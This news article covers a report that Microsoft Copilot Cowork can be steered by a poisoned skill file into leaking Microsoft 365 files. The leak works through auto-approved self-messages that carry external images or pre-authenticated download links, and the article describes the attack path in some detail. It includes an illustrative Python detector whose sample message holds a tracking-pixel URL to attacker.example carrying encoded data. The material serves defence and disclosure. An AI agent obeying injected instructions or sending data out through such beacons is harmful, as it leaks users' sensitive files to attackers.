Microsoft Copilot Cowork can be tricked into exfiltrating sensitive files, report says
Microsoft Copilot Cowork faces file-exfiltration risk
A new report says Microsoft Copilot Cowork can be manipulated into leaking sensitive files from Microsoft 365 through indirect prompt injection, exposing enterprises to a significant security risk.
The finding centers on insecure automatic approval of the actions that send email and Teams messages. According to the report, Copilot Cowork can be steered by a poisoned skill file containing prompt-injection instructions, letting an attacker exfiltrate data from the victim's Microsoft tenant using the agent's own permissions and its Microsoft Graph access.
Copilot Cowork is a Frontier feature in Microsoft 365 that operates with a user’s Microsoft permissions and can read and act on data across the tenant. The researchers say the attack worked at a high success rate even against state-of-the-art models, including Claude Opus 4.7.
How the attack works
Microsoft's documentation says Copilot Cowork asks for permission before taking sensitive actions such as sending email or posting in Teams. But the report says that in practice, messages sent to the active user go out immediately, without any human approval step, and users cannot change that behavior.
That creates a path for exfiltration even though the message never leaves the tenant: a compromised message can include external images or other content that triggers network requests when the user opens it in Outlook or Teams, so attacker-controlled requests fire from the victim's client, and the request itself is enough to carry data out. The report says Copilot Cowork can also retrieve pre-authenticated download links for files the user can access, and anyone who receives such a link can fetch the file without further authentication.
The victim scenario described in the report is a user who has access to SharePoint or OneDrive files containing PII and financial data and who uploads a skill file carrying the injected prompt to Copilot Cowork.
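As an added illustration, not code from the report or from Microsoft, here is a small Python checker for the two indicators described above in an outgoing HTML message body: images that auto-load from hosts outside a tenant allowlist, and URLs (image sources or links) whose path and query carry enough data to serve as an exfiltration channel or as a bearer-style token in a share link. The allowlist, the size threshold, the sample message and the `auth=` parameter name are all constructed assumptions; the hardened counterpart simply strips external image tags before the message is delivered.

```python
"""Constructed example: scan an outgoing Outlook/Teams-style HTML body for the
exfiltration indicators described in the report. Not the report's own code."""
import html
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlparse

# Assumed tenant allowlist: hosts a message may legitimately load images from.
TRUSTED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}

IMG_TAG_RE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
IMG_SRC_RE = re.compile(r"""<img\b[^>]*?\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
HREF_RE = re.compile(r"""<a\b[^>]*?\bhref\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    kind: str    # "external_image" or "data_in_url"
    url: str
    detail: str


def url_payload_bytes(url: str) -> int:
    """Bytes an attacker can smuggle in a URL the client will fetch: the path
    plus every query value. Long values here are the exfiltration channel."""
    p = urlparse(url)
    query_bytes = sum(len(v) for _, v in parse_qsl(p.query, keep_blank_values=True))
    return len(p.path) + query_bytes


def scan_message(body_html: str, trusted_hosts=TRUSTED_HOSTS, max_payload: int = 96) -> list:
    """Return findings for auto-loading external images and data-bearing URLs."""
    findings = []
    for m in IMG_SRC_RE.finditer(body_html):
        url = html.unescape(m.group(1))
        host = (urlparse(url).hostname or "").lower()
        if host and host not in trusted_hosts:
            findings.append(Finding("external_image", url,
                                    f"image auto-loads from untrusted host {host}"))
    # Both image sources and links can carry smuggled data or a pre-auth token.
    for m in list(IMG_SRC_RE.finditer(body_html)) + list(HREF_RE.finditer(body_html)):
        url = html.unescape(m.group(1))
        n = url_payload_bytes(url)
        if n > max_payload:
            findings.append(Finding("data_in_url", url,
                                    f"{n} bytes of path/query data (threshold {max_payload})"))
    return findings


def neutralize_external_images(body_html: str, trusted_hosts=TRUSTED_HOSTS) -> str:
    """Hardened delivery path: drop any <img> whose host is outside the allowlist
    so that opening the message fires no request to an attacker-chosen server."""
    def repl(m):
        src = SRC_RE.search(m.group(0))
        if not src:
            return m.group(0)
        host = (urlparse(html.unescape(src.group(1))).hostname or "").lower()
        if host and host not in trusted_hosts:
            return "<!-- external image removed -->"
        return m.group(0)
    return IMG_TAG_RE.sub(repl, body_html)


# Constructed sample: a 1x1 tracking pixel carrying 200 bytes of encoded data,
# a legitimate tenant image, and a share link with an assumed long auth token.
SAMPLE_BODY = (
    "<p>Quarterly numbers attached.</p>"
    '<img src="https://attacker.example/p.gif?d=' + "A" * 200 + '" width="1" height="1">'
    '<img src="https://contoso.sharepoint.com/logo.png">'
    '<a href="https://contoso.sharepoint.com/sites/fin/report.xlsx?auth=' + "x" * 150 + '">report</a>'
)

if __name__ == "__main__":
    for f in scan_message(SAMPLE_BODY):
        print(f.kind, f.url[:60], f.detail)
    print(neutralize_external_images(SAMPLE_BODY))
```

The `data_in_url` check is deliberately crude: it does not try to decode what is smuggled, only to measure how much a URL can carry, which is what matters for a beacon-style channel and for a link that grants access to anyone holding it.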
Broader enterprise exposure
The researchers say the issue is not limited to one injection source. Similar attacks could come from web data in tools like Claude for Chrome or from connected MCP servers. They argue the risk reflects a broader problem: giving agents access to multiple systems expands the prompt-injection attack surface, even when each individual capability appears benign in isolation.
Separate from the exfiltration path through messages, the researchers say they also disclosed to Microsoft a vulnerability that allows data to leave Copilot Cowork's sandbox environment directly.